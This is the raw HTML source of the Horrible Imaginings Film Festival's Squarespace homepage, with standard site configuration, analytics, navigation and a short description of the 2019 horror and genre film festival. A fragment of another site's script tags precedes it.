<![endif]--> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.7'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?ver=5.7'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.min.js?ver=5.7'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js?ver=5.2'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js?ver=5.7'></script> <script type='text/javascript' src='https://thenationonlineng.net/wp-content/plugins/js_composer/assets/js/dist/vc_grid.min.js?ver=5.7'></script> <div class="jeg_ad jnews_mobile_sticky_ads "></div></body> </html>
0
<!doctype html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:website="http://ogp.me/ns/website" lang="en-US" itemscope itemtype="http://schema.org/WebPage" > <head> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- This is Squarespace. --><!-- antelope-wombat-5khp --> <base href=""> <meta charset="utf-8" /> <title>HORRIBLE IMAGININGS FILM FESTIVAL</title> <link rel="shortcut icon" type="image/x-icon" href="https://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c508ef0562fa7296efa8c94/favicon.ico"/> <link rel="canonical" href="https://hifilmfest.com/"/> <meta property="og:site_name" content="HORRIBLE IMAGININGS FILM FESTIVAL"/> <meta property="og:title" content="HORRIBLE IMAGININGS FILM FESTIVAL"/> <meta property="og:url" content="https://hifilmfest.com/"/> <meta property="og:type" content="website"/> <meta property="og:image" content="http://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1548797736522/HIFF.png?format=1500w"/> <meta property="og:image:width" content="640"/> <meta property="og:image:height" content="533"/> <meta itemprop="name" content="HORRIBLE IMAGININGS FILM FESTIVAL"/> <meta itemprop="url" content="https://hifilmfest.com/"/> <meta itemprop="thumbnailUrl" content="http://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1548797736522/HIFF.png?format=1500w"/> <link rel="image_src" href="http://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1548797736522/HIFF.png?format=1500w" /> <meta itemprop="image" content="http://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1548797736522/HIFF.png?format=1500w"/> <meta name="twitter:title" content="HORRIBLE IMAGININGS FILM FESTIVAL"/> <meta name="twitter:image" content="http://static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1548797736522/HIFF.png?format=1500w"/> <meta name="twitter:url" content="https://hifilmfest.com/"/> <meta name="twitter:card" content="summary"/> <meta name="description" content="" /> <script type="text/javascript" src="//use.typekit.net/ik/UO0xNsAIdYXPUf0HFP7Mq2Sz0LtJWDD1zKnUFEqqA-GfeTbffFHN4UJLFRbh52jhWDmRFQMtjcbUwDjuZRMkw2sKw2JXjDy8wU76MPG0jAoXZAUzSe9lihNljcBXOQmn-YM0SaBujW48Sagyjh90jhNlOeB0iemCdag8OWizdA4yifXu-hy3O1FUiABkZWF3jAF8OcFzdPUG-AZTdeucZWFXOcFzdPUCdhFydeyzSabCiaiaOcB0iemCdag8OWizdA4yifXu-hy3O1FUiABkZWF3jAF8OcFzdPUaiaS0-e8c-AUlZcmDifoRdhXK2YgkdayTdAIldcNhjPG4fHvgIMMjgfMfH6qJnbIbMg6eJMJ7fbKOMsMMeMS6MKG4fOMgIMMj2KMfH6qJRMIbMg6sJMHbMpdVDpJB.js"></script> <script type="text/javascript">try{Typekit.load();}catch(e){}</script> <script type="text/javascript">SQUARESPACE_ROLLUPS = {};</script> <script>(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//static.squarespace.com/universal/scripts-compressed/common-107b7113479fd64a9c74-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common');</script> <script crossorigin="anonymous" src="//static.squarespace.com/universal/scripts-compressed/common-107b7113479fd64a9c74-min.en-US.js" ></script><script crossorigin="anonymous" src="//static.squarespace.com/universal/scripts-compressed/performance-6b3f9eaf6d4cbc71cdc8-min.en-US.js" defer ></script><script data-name="static-context">Static = window.Static || {}; Static.SQUARESPACE_CONTEXT = {"facebookAppId":"314192535267336","rollups":{"squarespace-announcement-bar":{"css":"//static.squarespace.com/universal/styles-compressed/announcement-bar-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/announcement-bar-1da068089eeaf6433934-min.en-US.js"},"squarespace-audio-player":{"css":"//static.squarespace.com/universal/styles-compressed/audio-player-a57b8f3aa31918104f57a068648fbc63-min.css","js":"//static.squarespace.com/universal/scripts-compressed/audio-player-c647ea3b3c9d84dc1ad6-min.en-US.js"},"squarespace-blog-collection-list":{"css":"//static.squarespace.com/universal/styles-compressed/blog-collection-list-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/blog-collection-list-dae61b6efffd234d480e-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//static.squarespace.com/universal/styles-compressed/calendar-block-renderer-9acef2d24c6a994fca1a8a82e99e19c3-min.css","js":"//static.squarespace.com/universal/scripts-compressed/calendar-block-renderer-3fac0a2a32676d10e398-min.en-US.js"},"squarespace-chartjs-helpers":{"css":"//static.squarespace.com/universal/styles-compressed/chartjs-helpers-9935a41d63cf08ca108505d288c1712e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/chartjs-helpers-3c22db23fb4c0ce1d0ff-min.en-US.js"},"squarespace-comments":{"css":"//static.squarespace.com/universal/styles-compressed/comments-a7b26c9ae88684f76d210b61d0b0d848-min.css","js":"//static.squarespace.com/universal/scripts-compressed/comments-b63c5a0def91b45e2af4-min.en-US.js"},"squarespace-commerce-cart":{"js":"//static.squarespace.com/universal/scripts-compressed/commerce-cart-70fcf9b5999b750c9f31-min.en-US.js"},"squarespace-dialog":{"css":"//static.squarespace.com/universal/styles-compressed/dialog-7d0827ef14cce0b773fcd1eee28fbdee-min.css","js":"//static.squarespace.com/universal/scripts-compressed/dialog-7dea686aed59989c6fc7-min.en-US.js"},"squarespace-events-collection":{"css":"//static.squarespace.com/universal/styles-compressed/events-collection-9acef2d24c6a994fca1a8a82e99e19c3-min.css","js":"//static.squarespace.com/universal/scripts-compressed/events-collection-8579e0a8f98969df6cf7-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//static.squarespace.com/universal/scripts-compressed/form-rendering-utils-876cdd438ec51a9337e5-min.en-US.js"},"squarespace-forms":{"css":"//static.squarespace.com/universal/styles-compressed/forms-ac7917c174031c937e3df4b3a2005b34-min.css","js":"//static.squarespace.com/universal/scripts-compressed/forms-417c0a5228f6965367ce-min.en-US.js"},"squarespace-gallery-collection-list":{"css":"//static.squarespace.com/universal/styles-compressed/gallery-collection-list-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/gallery-collection-list-7648566bab72920ef13d-min.en-US.js"},"squarespace-image-zoom":{"css":"//static.squarespace.com/universal/styles-compressed/image-zoom-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/image-zoom-10a26b85dd3967911f68-min.en-US.js"},"squarespace-pinterest":{"css":"//static.squarespace.com/universal/styles-compressed/pinterest-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/pinterest-dced14fb35881e9638d2-min.en-US.js"},"squarespace-popup-overlay":{"css":"//static.squarespace.com/universal/styles-compressed/popup-overlay-7b48efeab9b323dfdb524a256cf61595-min.css","js":"//static.squarespace.com/universal/scripts-compressed/popup-overlay-1d188496920efeba52fb-min.en-US.js"},"squarespace-product-quick-view":{"css":"//static.squarespace.com/universal/styles-compressed/product-quick-view-bc8694b75a40e4bd969b662b80ebafb5-min.css","js":"//static.squarespace.com/universal/scripts-compressed/product-quick-view-315dfe834a730708cc4c-min.en-US.js"},"squarespace-products-collection-item-v2":{"css":"//static.squarespace.com/universal/styles-compressed/products-collection-item-v2-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/products-collection-item-v2-710e7bfc2d9396294824-min.en-US.js"},"squarespace-products-collection-list-v2":{"css":"//static.squarespace.com/universal/styles-compressed/products-collection-list-v2-72b0ab7796582588032aa6472e2e2f14-min.css","js":"//static.squarespace.com/universal/scripts-compressed/products-collection-list-v2-6d9a105155618ddbb04b-min.en-US.js"},"squarespace-search-page":{"css":"//static.squarespace.com/universal/styles-compressed/search-page-ea3e98edb84abbc5e758884f69149027-min.css","js":"//static.squarespace.com/universal/scripts-compressed/search-page-cd3faa7269d59ec8c326-min.en-US.js"},"squarespace-search-preview":{"js":"//static.squarespace.com/universal/scripts-compressed/search-preview-a6817cbe59ea35029fb2-min.en-US.js"},"squarespace-share-buttons":{"js":"//static.squarespace.com/universal/scripts-compressed/share-buttons-d32aa529f3e1ac692f58-min.en-US.js"},"squarespace-simple-liking":{"css":"//static.squarespace.com/universal/styles-compressed/simple-liking-310d0b18e112f708f91339b11fd55714-min.css","js":"//static.squarespace.com/universal/scripts-compressed/simple-liking-4c51a395c94f1ab1ea45-min.en-US.js"},"squarespace-social-buttons":{"css":"//static.squarespace.com/universal/styles-compressed/social-buttons-26106f808f7e9c739a7f862a408ed039-min.css","js":"//static.squarespace.com/universal/scripts-compressed/social-buttons-88125918b982c2d2bce3-min.en-US.js"},"squarespace-tourdates":{"css":"//static.squarespace.com/universal/styles-compressed/tourdates-d41d8cd98f00b204e9800998ecf8427e-min.css","js":"//static.squarespace.com/universal/scripts-compressed/tourdates-75372f0aa921d11c87a5-min.en-US.js"},"squarespace-website-overlays-manager":{"css":"//static.squarespace.com/universal/styles-compressed/website-overlays-manager-df9cddfe3eca22764d10fd6fc4f4ad73-min.css","js":"//static.squarespace.com/universal/scripts-compressed/website-overlays-manager-6473ec2d040da15ca868-min.en-US.js"}},"pageType":2,"website":{"id":"5c508bd1365f0204b024c8e3","identifier":"antelope-wombat-5khp","websiteType":1,"contentModifiedOn":1557958248097,"cloneable":false,"siteStatus":{},"language":"en-US","timeZone":"America/Los_Angeles","machineTimeZoneOffset":-25200000,"timeZoneOffset":-25200000,"timeZoneAbbr":"PDT","siteTitle":"HORRIBLE IMAGININGS FILM FESTIVAL","fullSiteTitle":"HORRIBLE IMAGININGS FILM FESTIVAL","siteTagLine":"AUGUST 30TH - SEPTEMBER 1ST, 2019 | SANTA ANA, CA","siteDescription":"","logoImageId":"5c50c71a88251bf9eb55ac55","shareButtonOptions":{"3":true,"6":true,"2":true,"1":true,"4":true,"8":true,"5":true,"7":true},"logoImageUrl":"//static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1557958248097/","authenticUrl":"https://hifilmfest.com","internalUrl":"https://antelope-wombat-5khp.squarespace.com","baseUrl":"https://hifilmfest.com","primaryDomain":"hifilmfest.com","sslSetting":3,"isHstsEnabled":true,"socialAccounts":[{"serviceId":10,"userId":"54895797","userName":"hifilmfest","screenname":"Horrible Imaginings Film Fest","addedOn":1548803839587,"profileUrl":"http://instagram.com/hifilmfest","iconUrl":"https://scontent.cdninstagram.com/vp/a03a4aa69ae5db995ab43ea5cf640443/5CEF20FA/t51.2885-19/s150x150/50618731_703883570008374_4599911305455861760_n.jpg?_nc_ht=scontent.cdninstagram.com","collectionId":"5c50deff4eddec766226dc76","iconEnabled":true,"serviceName":"instagram"},{"serviceId":2,"userId":"10104856149065325","screenname":"Miguel Rodriguez","addedOn":1548803766873,"profileUrl":"https://www.facebook.com/HorribleImaginings/","iconUrl":"http://graph.facebook.com/10104856149065325/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook"},{"serviceId":4,"userId":"25894094","userName":"HIFilmFest","screenname":"Horrible Imaginings","addedOn":1548800221656,"profileUrl":"https://twitter.com/HIFilmFest","iconUrl":"http://pbs.twimg.com/profile_images/991704034129068033/3alBIwaZ_normal.jpg","collectionId":"5c50d0dd297114e8bf9ca860","iconEnabled":true,"serviceName":"twitter"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"screenshotId":"5dda3e6452b09ed393a07eb6e5f0dee26de2bffc42c278f79334dd2d79306867","showOwnerLogin":false},"websiteSettings":{"id":"5c508bd1365f0204b024c8e6","websiteId":"5c508bd1365f0204b024c8e3","subjects":[],"country":"US","state":"CA","simpleLikingEnabled":true,"mobileInfoBarSettings":{"style":1,"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":false,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":true,"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"paymentSettings":{},"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"enableMailingListOptInByDefault":false,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":""},"websiteCloneable":false,"collection":{"title":"HOME","id":"5c50c5fc562fa792b1bd0a6a","fullUrl":"/","type":10},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","gallery-arrow-style":"Circular","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Grid","gallery-info-overlay":"Show on Hover","gallery-loop":"true","gallery-navigation":"Circles","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"320px","gridSpacing":"20px","product-gallery-auto-crop":"true","product-image-auto-crop":"true"},"templateId":"4f6a1392e4b07090d46e7ec9","pageFeatures":[1,2,4],"googleMapsStaticApiKey":"AIzaSyBQdch5IcgcQaKNG76sbMQv1MEBEKLeQ-8","betaFeatureFlags":["ORDERS-SERVICE-check-digital-good-access-with-service","ORDERS-SERVICE-reset-digital-goods-access-with-service","dg_downloads_from_fastly","product-retriever-v2-enabled","domain_locking_via_registrar_service","image_editor_experimental_features","domain_deletion_via_registrar_service","domain_info_via_registrar_service","domain_renewal_via_registrar_service","add_new_page_alt","image_picker","collection_orchestrator_endpoints"],"impersonatedSession":false,"demoCollections":[{"collectionId":"527d3781e4b05acc5f1bb99c","deleted":true},{"collectionId":"527d37a8e4b080fe1829dc73","deleted":true},{"collectionId":"527d37a1e4b080fe1829dc66","deleted":true}],"tzData":{"zones":[[-480,"US","P%sT",null]],"rules":{"US":[[1967,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun>=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun>=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun>=1","2:00","0","S"]]}}};</script><script type="text/javascript"> SquarespaceFonts.loadViaContext(); Squarespace.load(window);</script><script type="application/ld+json">{"url":"https://hifilmfest.com","name":"HORRIBLE IMAGININGS FILM FESTIVAL","description":"","image":"//static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1557958248097/","@context":"http://schema.org","@type":"WebSite"}</script><!--[if gte IE 9]> <link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&part=1"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&part=2"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&part=3"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&part=4"/><![endif]--> <!--[if lt IE 9]><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&noMedia=true&part=1"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&noMedia=true&part=2"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&noMedia=true&part=3"/><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false&noMedia=true&part=4"/><![endif]--> <!--[if !IE]> --><link rel="stylesheet" type="text/css" href="//static1.squarespace.com/static/sitecss/5c508bd1365f0204b024c8e3/27/4f6a1392e4b07090d46e7ec9/5c50c5890ebbe8e4534c8589/1593-05142015/1557958132425/site.css?&filterFeatures=false"/><!-- <![endif]--> <script>Static.COOKIE_BANNER_CAPABLE = true;</script> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create', 'UA-61904919-1', 'auto');ga('send', 'pageview');</script><!-- End of Squarespace Headers --> </head> <body class="underline-body-links blog-meta-data-split hide-author social-icon-style-round show-products-category-navigation event-show-past-events event-thumbnails event-thumbnail-size-32-standard event-date-label event-list-show-cats event-list-date event-list-time event-list-address event-icalgcal-links event-excerpts gallery-design-grid aspect-ratio-auto lightbox-style-light gallery-navigation-circles gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-circular gallery-transitions-fade gallery-show-arrows gallery-auto-crop gallery-loop product-list-titles-under product-list-alignment-center product-item-size-11-square product-image-auto-crop product-gallery-size-11-square product-gallery-auto-crop show-product-price show-product-item-nav product-social-sharing newsletter-style-dark hide-opentable-icons opentable-style-dark small-button-style-solid small-button-shape-square medium-button-style-solid medium-button-shape-square large-button-style-solid large-button-shape-square image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-left image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-outline button-corner-style-rounded tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-type-page collection-layout-default collection-5c50c5fc562fa792b1bd0a6a homepage mobile-style-available" id="collection-5c50c5fc562fa792b1bd0a6a"> <div id="site"> <div id="canvas"> <div id="headerWrapper"> <header id="header"> <div id="headerInfo"> <h1 class="logo image"> <a href="/" title="HORRIBLE IMAGININGS FILM FESTIVAL" role="bookmark" data-content-field="site-title"> <span class="placed-logo-image"><img src="//static1.squarespace.com/static/5c508bd1365f0204b024c8e3/t/5c50c71a88251bf9eb55ac55/1557958248097/?format=1500w" alt="HORRIBLE IMAGININGS FILM FESTIVAL" /></span> </a> </h1> <p class="site-tagline" data-content-field="site-tagline">AUGUST 30TH - SEPTEMBER 1ST, 2019 | SANTA ANA, CA</p> <script> Y.use('squarespace-ui-base', function(Y) { Y.one("h1.logo").plug(Y.Squarespace.TextShrink, { parentEl: Y.one('#header'), minFontSize: 16 }); if (Y.one('p.site-tagline')){ Y.one("p.site-tagline").plug(Y.Squarespace.TextShrink, { parentEl: Y.one('#header'), minFontSize: 12 }); } }); </script> <div id="navBlock" role="navigation"> <nav class="main-nav" data-content-field="navigation"> <ul> <li class="page-collection active-link"> <a href="/">HOME</a> </li> <li class="page-collection"> <a href="/tickets">TICKETS</a> </li> <li class="page-collection"> <a href="/events">UPCOMING EVENTS</a> </li> <li class="gallery-collection"> <a href="/gallery">GALLERY</a> </li> <li class="blog-collection"> <a href="/present-fears">Present Fears Blog</a> </li> <li class="page-collection"> <a href="/contact">CONTACT</a> </li> </ul> <select id="mobileSelect" name="mobileSelect"> <option class="mobile-select-label" value="">Navigation</option> <option class="page-collection" value="/" selected="selected">HOME</option> <option class="page-collection" value="/tickets">TICKETS</option> <option class="page-collection" value="/events">UPCOMING EVENTS</option> <option class="gallery-collection" value="/gallery">GALLERY</option> <option class="blog-collection" value="/present-fears">Present Fears Blog</option> <option class="page-collection" value="/contact">CONTACT</option> </select> </nav> </div> <!-- CATEGORY NAV --> </div> </header> </div><!-- / headerWrapper --> <div id="pageWrapper" class="hfeed" role="main"> <section id="page" data-content-field="main-content"> <div class="sqs-layout sqs-grid-12 columns-12" data-type="page" data-updated-on="1557934615737" id="page-5c50c5fc562fa792b1bd0a6a"><div class="row sqs-row"><div class="col sqs-col-12 span-12"><div class="sqs-block button-block sqs-block-button" data-block-type="53" id="block-yui_3_17_2_1_1554492274074_7562"><div class="sqs-block-content"> <div class="sqs-block-button-container--center" data-alignment="center" data-button-size="medium"> <a href="http://hifilmfest.ticketleap.com/10th-hifilmfest/" class="sqs-block-button-element--medium sqs-block-button-element" target="_blank">BUY TICKETS NOW!</a> </div></div></div><div class="sqs-block socialaccountlinks-v2-block sqs-block-socialaccountlinks-v2" data-block-type="54" id="block-yui_3_17_2_1_1548799938021_15678"><div class="sqs-block-content"> <div class="sqs-svg-icon--outer social-icon-alignment-center social-icons-color-standard social-icons-size-medium social-icons-style-regular " > <nav class="sqs-svg-icon--list"> <a href="http://instagram.com/hifilmfest" target="_blank" class="sqs-svg-icon--wrapper instagram"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#instagram-icon"></use> <use class="sqs-use--mask" xlink:href="#instagram-mask"></use> </svg> </div> </a><a href="https://www.facebook.com/HorribleImaginings/" target="_blank" class="sqs-svg-icon--wrapper facebook"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#facebook-icon"></use> <use class="sqs-use--mask" xlink:href="#facebook-mask"></use> </svg> </div> </a><a href="https://twitter.com/HIFilmFest" target="_blank" class="sqs-svg-icon--wrapper twitter"> <div> <svg class="sqs-svg-icon--social" viewBox="0 0 64 64"> <use class="sqs-use--icon" xlink:href="#twitter-icon"></use> <use class="sqs-use--mask" xlink:href="#twitter-mask"></use> </svg> </div> </a> </nav> </div></div></div><div class="sqs-block image-block sqs-block-image" data-block-type="5" id="block-1e85ba081cf8ccc300ab"><div class="sqs-block-content"> <div class="image-block-outer-wrapper layout-caption-hidden design-layout-inline combination-animation-none individual-animation-none individual-text-animation-none"> <div class="intrinsic" style="max-width:1944.0px;"> <div style="padding-bottom:148.1481475830078%;" class="image-block-wrapper has-aspect-ratio" data-description="" > <noscript><img src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554830746282-QH29ZFIT8D4VK2G3IF3C/ZTRoMIPUpPwdLR0Jt3A6BqglooICZeoqPodNzwnL3MblfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJNraCc1JUmkwyDhfzMWPlab_cUbOb3nrGBXAcqpsp0_aMMR040T2ghp1dUK0LN_wC1kAxoLFOLnN0LUGkB6nV0s/2019+Horrible+Imaginings+Poster+-+FINAL.png" alt="2019 Horrible Imaginings Poster - FINAL.png" /></noscript><img class="thumb-image" data-src="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554830746282-QH29ZFIT8D4VK2G3IF3C/ZTRoMIPUpPwdLR0Jt3A6BqglooICZeoqPodNzwnL3MblfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJNraCc1JUmkwyDhfzMWPlab_cUbOb3nrGBXAcqpsp0_aMMR040T2ghp1dUK0LN_wC1kAxoLFOLnN0LUGkB6nV0s/2019+Horrible+Imaginings+Poster+-+FINAL.png" data-image="https://images.squarespace-cdn.com/content/v1/5c508bd1365f0204b024c8e3/1554830746282-QH29ZFIT8D4VK2G3IF3C/ZTRoMIPUpPwdLR0Jt3A6BqglooICZeoqPodNzwnL3MblfiSMXz2YNBs8ylwAJx2qgRUppHe6ToX8uSOdETM-Xp5E02Oe1rtbZmJq_nKzBJNraCc1JUmkwyDhfzMWPlab_cUbOb3nrGBXAcqpsp0_aMMR040T2ghp1dUK0LN_wC1kAxoLFOLnN0LUGkB6nV0s/2019+Horrible+Imaginings+Poster+-+FINAL.png" data-image-dimensions="1944x2880" data-image-focal-point="0.5,0.5" alt="2019 Horrible Imaginings Poster - FINAL.png" data-load="false" data-image-id="5cacd580e79c7029b2564e6d" data-type="image" /> </div> </div> </div> </div></div><div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-605ae67fd8251a89a894"><div class="sqs-block-content"><p style="text-align:center;white-space:pre-wrap;" class="">Established in San Diego, CA in 2009, the annual Horrible Imaginings Film Festival showcases the newest voices in horror, sci-fi, and fantasy genre cinema over a multi-day event that consists of film screenings, diverse panels, parties, and networking sessions.</p><p style="text-align:center;white-space:pre-wrap;" class="">Our mission is to spotlight genre cinema, amplify artistic voices, and foster a community of acceptance. We sincerely believe in the sharing and exploring of our deepest fears, desires, and anxieties in a community setting. This festival allows audience members the opportunity to not only explore these complex emotions but also exorcise them.</p><p style="text-align:center;white-space:pre-wrap;" class="">Over the past 9 years, we have screened over 700 genre titles and welcomed over 8,000 passionate attendees.</p></div></div><div class="sqs-block gallery-block sqs-block-gallery" data-aspect-ratio="17.5" data-block-json="&#123;&quot;hSize&quot;:null,&quot;floatDir&quot;:null,&quot;methodOption&quot;:&quot;transient&quot;,&quot;existingGallery&quot;:null,&quot;newWindow&quot;:false,&quot;active-alignment&quot;:&quot;center&quot;,&quot;aspectRatio&quot;:17.5,&quot;auto-crop&quot;:true,&quot;autoplay&quot;:true,&quot;autoplay-duration&quot;:3,&quot;blockAnimation&quot;:&quot;none&quot;,&quot;collectionId&quot;:&quot;5c52195a4d7a9c817744fc39&quot;,&quot;controls&quot;:false,&quot;design&quot;:&quot;slider&quot;,&quot;show-meta&quot;:true,&quot;show-meta-basic&quot;:true,&quot;show-meta-only-title&quot;:false,&quot;show-meta-only-description&quot;:false,&quot;square-thumbs&quot;:true,&quot;vSize&quot;:null,&quot;transientGalleryId&quot;:&quot;5c52195a4d7a9c817744fc39&quot;&#125;" data-block-type="8" id="block-yui_3_17_2_1_1548883584471_16153"><div class="sqs-block-content"> <div class=" sqs-gallery-container sqs-gallery-block-slider sqs-gallery-block-show-meta block-animation-none clear" > <div 